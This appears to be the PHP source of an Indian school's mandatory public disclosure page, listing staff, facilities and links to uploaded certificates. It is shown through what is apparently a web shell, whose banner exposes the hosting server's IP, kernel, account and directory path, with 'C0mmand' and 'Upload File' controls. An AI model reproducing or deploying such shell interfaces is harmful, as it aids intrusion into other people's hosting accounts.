|
Server IP : 2a02:4780:11:1359:0:1d43:a566:2 / Your IP : 216.73.216.52 Web Server : LiteSpeed System : Linux in-mum-web1259.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u490972518 ( 490972518) PHP Version : 5.6.40 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : ON | cURL : ON | WGET : ON | Perl : OFF | Python : ON Directory (0755) : /home/u490972518/domains/ppschool.org.in/../swrampyarejan.in/public_html/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE php>
<php lang="en">
<head>
<?php include('link/header.php');
include("link/databaseconnection.php");
?>
<!-- Content -->
<div class="page-content new-style-admin-page">
<!-- inner page banner -->
<div class="dez-bnr-inr overlay-black-middle" style="background-image:url(images/slider/school.jpeg);">
<div class="container">
<div class="dez-bnr-inr-entry">
</div>
</div>
</div>
<!-- inner page banner END -->
<!-- Breadcrumb row -->
<div class="breadcrumb-row">
<div class="container">
<ul class="list-inline">
<li><a href="index.php">Home</a></li>
<li>Mandatory Public Disclosure</li>
</ul>
</div>
</div>
<!-- Breadcrumb row END -->
<!-- About Company -->
<div class="section-full bg-white p-t70 p-b40">
<div class="container">
<div class="section-content">
<div class="row">
<center><h4>Mandatory Public Disclosure</h4></center>
<div class="col-md-12">
<div class="icon-bx-wraper bx-style-1 p-a20 left m-b30">
<h6>A - GENERAL INFORMATION</h6>
<div class="icon-content">
<table class="table table table-bordered table table-striped">
<thead class="thead-dark">
<tr>
<th scope="col">SL NO.</th>
<th scope="col">INFORMATION</th>
<th scope="col">DETAILS</th>
</tr>
</thead>
<tbody>
<tr align='left'>
<td scope="col">1</td>
<td scope="col">NAME OF THE SCHOOL</td>
<td scope="col">J DAWN WASCO SCHOOL</td>
</tr>
<tr align='left'>
<td scope="col">2</td>
<td scope="col">AFFLIATION NO</td>
<td scope="col">2133291</td>
</tr>
<tr align='left'>
<td scope="col">3</td>
<td scope="col">SCHOOL CODE</td>
<td scope="col">71516</td>
</tr>
<tr align='left'>
<td scope="col">4</td>
<td scope="col">COMPLETE ADDRESS WITH PIN CODE</td>
<td scope="col">Khojapur ,Chakinami, Azamgarh,
Uttar Pradesh, India , pincode-276001</td>
</tr>
<tr align='left'>
<td scope="col">5</td>
<td scope="col">PRINCIPAL NAME & QUALIFICATION</td>
<td scope="col">Mr. SANTOSH KUMAR YADAV (M.A., B.ED , UGCNET)</td>
</tr>
<tr align='left'>
<td scope="col">6</td>
<td scope="col">SCHOOL EMAIL ID</td>
<td scope="col">jdawnwasco2011@gmail.com</td>
</tr>
<tr align='left'>
<td scope="col">7</td>
<td scope="col">CONTACT DETAILS </td>
<td scope="col">7318565965</td>
</tr>
</tbody>
</table>
<h6>B - DOCUMENTS AND INFORMATION</h6>
<div class="table-responsive">
<table class="table table table-bordered table table-striped table-responsive">
<thead class="thead-dark">
<tr>
<th scope="col">SL NO.</th>
<th scope="col">DOCUMENT AND INFORMATION</th>
<th scope="col">UPLOAD DOCUMENTS</th>
</tr>
</thead>
<tbody>
<tr align='left'>
<td scope="col">1</td>
<td scope="col"> COPIES OF AFFLIATION/UPGRADATION LETTER AND RECENT EXTENSION OF AFFILIATION IF ANY</td>
<td scope="col">
<?php
$sel12="select * from upload where area='COPIES OF AFFLIATION/UPGRADATION LETTER AND RECENT EXTENSION OF AFFILIATION IF ANY' order by id desc";
$res12=mysqli_query($conn,$sel12);
$row12=mysqli_fetch_array($res12,MYSQLI_BOTH);
if($row12)
{
?>
<a href='code/img/<?php echo $row12['image']?>' target='_blank'>Click For Show </a>
<?php }?>
</td>
</tr>
<tr align='left'>
<td scope="col">2</td>
<td scope="col">COPIES OF SOCIETIES/TRUST/COMPANYREGISTRATION/RENEWAL CERTIFICATE AS APPLICABLE</td>
<td scope="col">
<?php
$sel121="select * from upload where area='COPIES OF SOCIETIES/TRUST/COMPANYREGISTRATION/RENEWAL CERTIFICATE AS APPLICABLE' order by id desc";
$res121=mysqli_query($conn,$sel121);
$row121=mysqli_fetch_array($res121,MYSQLI_BOTH);
if($row121)
{
?>
<a href='code/img/<?php echo $row121['image']?>' target='_blank'>Click For Show </a>
<?php }?>
</td>
</tr>
<tr align='left'>
<td scope="col">3</td>
<td scope="col">COPIES OF NO OBJECTION CERTIFICATE(NOC) ISSUED IF APPLICABLE BY THE STATE GOVT/UT</td>
<td scope="col">
<?php
$sel1211="select * from upload where area='COPIES OF NO OBJECTION CERTIFICATE(NOC) ISSUED IF APPLICABLE BY THE STATE GOVT/UT' order by id desc";
$res1211=mysqli_query($conn,$sel1211);
$row1211=mysqli_fetch_array($res1211,MYSQLI_BOTH);
if($row1211)
{
?>
<a href='code/img/<?php echo $row1211['image']?>' target='_blank'>Click For Show </a>
<?php }?>
</td>
</tr>
<tr align='left'>
<td scope="col">4</td>
<td scope="col">COPIES OF RECOGNITION CERTIFICATE UNDER RTE ACT 2009 AND ITS RENEWAL IF APPLICABLE</td>
<td scope="col">
<?php
$sel12111="select * from upload where area='COPIES OF RECOGNITION CERTIFICATE UNDER RTE ACT 2009 AND ITS RENEWAL IF APPLICABLE' order by id desc";
$res12111=mysqli_query($conn,$sel12111);
$row12111=mysqli_fetch_array($res12111,MYSQLI_BOTH);
if($row12111)
{
?>
<a href='code/img/<?php echo $row12111['image']?>' target='_blank'>Click For Show </a>
<?php }?>
</td>
</tr>
<tr align='left'>
<td scope="col">5</td>
<td scope="col">COPIES OF VALID BUILDING SAFETY CERTIFICATE AS PER THE NATIONAL BUILDING CODE</td>
<td scope="col">
<?php
$sel2="select * from upload where area='COPIES OF VALID BUILDING SAFETY CERTIFICATE AS PER THE NATIONAL BUILDING CODE' order by id desc";
$res2=mysqli_query($conn,$sel2);
$row2=mysqli_fetch_array($res2,MYSQLI_BOTH);
if($row2)
{
?>
<a href='code/img/<?php echo $row2['image']?>' target='_blank'>Click For Show </a>
<?php }?>
</td>
</tr>
<tr align='left'>
<td scope="col">6</td>
<td scope="col">COPIES OF VALID FIRE SAFETY CERTIFICATE ISSUED BY THE COMPETENT AUTHORITY </td>
<td scope="col">
<?php
$sel21="select * from upload where area='COPIES OF VALID FIRE SAFETY CERTIFICATE ISSUED BY THE COMPETENT AUTHORITY' order by id desc";
$res21=mysqli_query($conn,$sel21);
$row21=mysqli_fetch_array($res21,MYSQLI_BOTH);
if($row21)
{
?>
<a href='code/img/<?php echo $row21['image']?>' target='_blank'>Click For Show </a>
<?php }?>
</td>
</tr>
<tr align='left'>
<td scope="col">7</td>
<td scope="col">COPIES OF THE DEO CERTIFICATE SUBMITED BY THE SCHOOL
AFFLIATION/UPGRADATION/EXTENSION OF AFFLIATION OR SELF CERTIFICATION BY SCHOOL </td>
<td scope="col">
<?php
$sel211="select * from upload where area='COPIES OF THE DEO CERTIFICATE SUBMITED BY THE SCHOOL AFFLIATION/UPGRADATION/EXTENSION OF AFFLIATION OR SELF CERTIFICATION BY SCHOOL' order by id desc";
$res211=mysqli_query($conn,$sel211);
$row211=mysqli_fetch_array($res211,MYSQLI_BOTH);
if($row211)
{
?>
<a href='code/img/<?php echo $row211['image']?>' target='_blank'>Click For Show </a>
<?php }?>
</td>
</tr>
<tr align='left'>
<td scope="col">8</td>
<td scope="col">COPIES OF VALID WATER HELTH AND SANITATION CERTIFICATES </td>
<td scope="col">
<?php
$sel2111="select * from upload where area='COPIES OF VALID WATER HELTH AND SANITATION CERTIFICATES' order by id desc";
$res2111=mysqli_query($conn,$sel2111);
$row2111=mysqli_fetch_array($res2111,MYSQLI_BOTH);
if($row2111)
{
?>
<a href='code/img/<?php echo $row2111['image']?>' target='_blank'>Click For Show </a>
<?php }?>
</td>
</tr>
</tbody>
</table>
</div>
<h6>C - RESULT AND ACADEMICS</h6>
<table class="table table table-bordered table table-striped">
<thead class="thead-dark">
<tr>
<th scope="col">SL NO.</th>
<th scope="col">DOCUMENT AND INFORMATION</th>
<th scope="col">UPLOAD DOCUMENTS</th>
</tr>
</thead>
<tbody>
<tr align='left'>
<td scope="col">1</td>
<td scope="col">FEES STRUCTURE OF THE SCHOOL</td>
<td scope="col">
<?php
$sel3="select * from upload where area='FEES STRUCTURE OF THE SCHOOL' order by id desc";
$res3=mysqli_query($conn,$sel3);
$row3=mysqli_fetch_array($res3,MYSQLI_BOTH);
if($row3)
{
?>
<a href='code/img/<?php echo $row3['image']?>' target='_blank'>Click For Show </a>
<?php }?>
</td>
</tr>
<tr align='left'>
<td scope="col">2</td>
<td scope="col">ANNUAL ACADEMIC CALANDER</td>
<td scope="col">
<?php
$sel31="select * from upload where area='ANNUAL ACADEMIC CALANDER' order by id desc";
$res31=mysqli_query($conn,$sel31);
$row31=mysqli_fetch_array($res31,MYSQLI_BOTH);
if($row31)
{
?>
<a href='code/img/<?php echo $row31['image']?>' target='_blank'>Click For Show </a>
<?php }?>
</td>
</tr>
<tr align='left'>
<td scope="col">3</td>
<td scope="col">LIST OF SCHOOL MANAGEMENT COMMITTEE(SMC)</td>
<td scope="col">
<?php
$sel311="select * from upload where area='LIST OF SCHOOL MANAGEMENT COMMITTEE(SMC)' order by id desc";
$res311=mysqli_query($conn,$sel311);
$row311=mysqli_fetch_array($res311,MYSQLI_BOTH);
if($row311)
{
?>
<a href='code/img/<?php echo $row311['image']?>' target='_blank'>Click For Show </a>
<?php }?>
</td>
</tr>
<tr align='left'>
<td scope="col">4</td>
<td scope="col">LIST OF PARRENTS TEACHERS ASSOCIATION (PTA) MEMBERS</td>
<td scope="col">
<?php
$sel3111="select * from upload where area='LIST OF PARRENTS TEACHERS ASSOCIATION (PTA) MEMBERS' order by id desc";
$res3111=mysqli_query($conn,$sel3111);
$row3111=mysqli_fetch_array($res3111,MYSQLI_BOTH);
if($row3111)
{
?>
<a href='code/img/<?php echo $row3111['image']?>' target='_blank'>Click For Show </a>
<?php }?>
</td>
</tr>
<tr align='left'>
<td scope="col">5</td>
<td scope="col">LAST THREE YEAR RESULT OF THE BOARD EXAMINATION AS PER APPLICABLILITY</td>
<td scope="col">
<?php
$sel31111="select * from upload where area='LAST THREE YEAR RESULT OF THE BOARD EXAMINATION AS PER APPLICABLILITY' order by id desc";
$res31111=mysqli_query($conn,$sel31111);
$row31111=mysqli_fetch_array($res31111,MYSQLI_BOTH);
if($row31111)
{
?>
<a href='code/img/<?php echo $row31111['image']?>' target='_blank'>Click For Show </a>
<?php }?>
</td>
</tr>
</tbody>
</table>
<h6>D - STAFF (TEACHING)</h6>
<table class="table table table-bordered table table-striped">
<thead class="thead-dark">
<tr>
<th scope="col">SL NO.</th>
<th scope="col"> INFORMATION</th>
<th scope="col">DETAILS</th>
</tr>
</thead>
<tbody>
<tr align='left'>
<td scope="col">1</td>
<td scope="col">PRINCIPAL</td>
<td scope="col">Mr. SANTOSH KUMAR YADAV</td>
</tr>
<tr align='left'>
<td scope="col" rowspan='4'>2</td>
<td scope="col">TOTAL NUMBERS OF TEACHER</td>
<td scope="col">28</td>
</tr>
<tr align='left'>
<td scope="col">PGT</td>
<td scope="col">11</td>
</tr>
<tr align='left'>
<td scope="col">TGT</td>
<td scope="col">09</td>
</tr>
<tr align='left'>
<td scope="col">PRT</td>
<td scope="col">08</td>
</tr>
<tr align='left'>
<td scope="col">3</td>
<td scope="col">TEACHERS SECTION RATIO</td>
<td scope="col">1:1.5</td>
</tr>
<tr align='left'>
<td scope="col">4</td>
<td scope="col">DETAILS OF SPECIAL EDUCATOR</td>
<td scope="col">Mr. SURENDRA NATH YADAV [ M.A , B.ED.(Special)]</td>
</tr>
<tr align='left'>
<td scope="col">5</td>
<td scope="col">DETAILS COUNSELLOR AND WELNESS TEACHER </td>
<td scope="col">Mr. JANGBAHADUR MAURYA [M.A ( Psychology)]</td>
</tr>
</tbody>
</table>
<h6>D - STAFF (TEACHING)</h6>
<table class="table table table-bordered table table-striped">
<thead class="thead-dark">
<tr>
<th scope="col">SL NO.</th>
<th scope="col">INFORMATION</th>
<th scope="col">DETAILS</th>
</tr>
</thead>
<tbody>
<tr align='left'>
<td scope="col">1</td>
<td scope="col">TOTAL CAMPUS AREA OF THE SCHOOL ( IN SQUARE MTR)</td>
<td scope="col">8093.712 sq.mtrs</td>
</tr>
<tr align='left'>
<td scope="col">2</td>
<td scope="col">NO. & SIZE OF THE CLASS ROOM (IN SQFTMTR)</td>
<td scope="col"> 21 ( 48 sq.mtrs.)</td>
</tr>
<tr align='left'>
<td scope="col">3</td>
<td scope="col">NO. & SIZE LABORATORIES INCLUDING COMPUTER LABS ( IN SQ MTR)</td>
<td scope="col">06 (317.99 sq.mtrs.) </td>
</tr>
<tr align='left'>
<td scope="col">4</td>
<td scope="col">INTERNET FACILITY (Y/N)</td>
<td scope="col">Y</td>
</tr>
<tr align='left'>
<td scope="col">5</td>
<td scope="col">NO. OF THE GIRLS TOILETS</td>
<td scope="col">05</td>
</tr>
<tr align='left'>
<td scope="col">6</td>
<td scope="col">NO. OF THE BOYS TOILETS</td>
<td scope="col">05</td>
</tr>
<tr align='left'>
<td scope="col">7</td>
<td scope="col">LINK OF YOUTUBE VIDEO OF THE INSPECTION OF SCHOOL COVERING THE INFRASTRUCTURE OF THE SCHOOL</td>
<td scope="col"><a href='https://www.youtube.com/watch?v=QIw-7HiU5A0' target='_blank'> YouTube</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- About Company END -->
</div>
<!-- Content END-->
<!-- Footer -->
<?php include('link/footer.php')?>
<!-- Footer END-->
<!-- Footer End -->
<button class="scroltop fa fa-long-arrow-up"></button>
</div>
<!-- JavaScript files ========================================= -->
<script type="text/javascript" src="js/jquery.min.js"></script>
<!-- jquery.min js -->
<script type="text/javascript" src="js/bootstrap.min.js"></script>
<!-- bootstrap.min js -->
<script type="text/javascript" src="js/bootstrap-select.min.js"></script>
<!-- Form js -->
<script type="text/javascript" src="js/jquery.bootstrap-touchspin.js"></script>
<!-- Form js -->
<script type="text/javascript" src="js/magnific-popup.js"></script>
<!-- magnific-popup js -->
<script type="text/javascript" src="js/waypoints-min.js"></script>
<!-- waypoints js -->
<script type="text/javascript" src="js/counterup.min.js"></script>
<!-- counterup js -->
<script type="text/javascript" src="js/imagesloaded.js"></script>
<!-- masonry -->
<script type="text/javascript" src="js/masonry-3.1.4.js"></script>
<!-- masonry -->
<script type="text/javascript" src="js/masonry.filter.js"></script>
<!-- masonry -->
<script type="text/javascript" src="js/owl.carousel.js"></script>
<!-- OWL Slider -->
<script type="text/javascript" src="js/custom.min.js"></script>
<!-- custom fuctions -->
<script type="text/javascript" src="js/sortcode.php"></script>
<script src="js/wow.min.js"></script>
<script>
new WOW().init();
</script>
</body>
</php>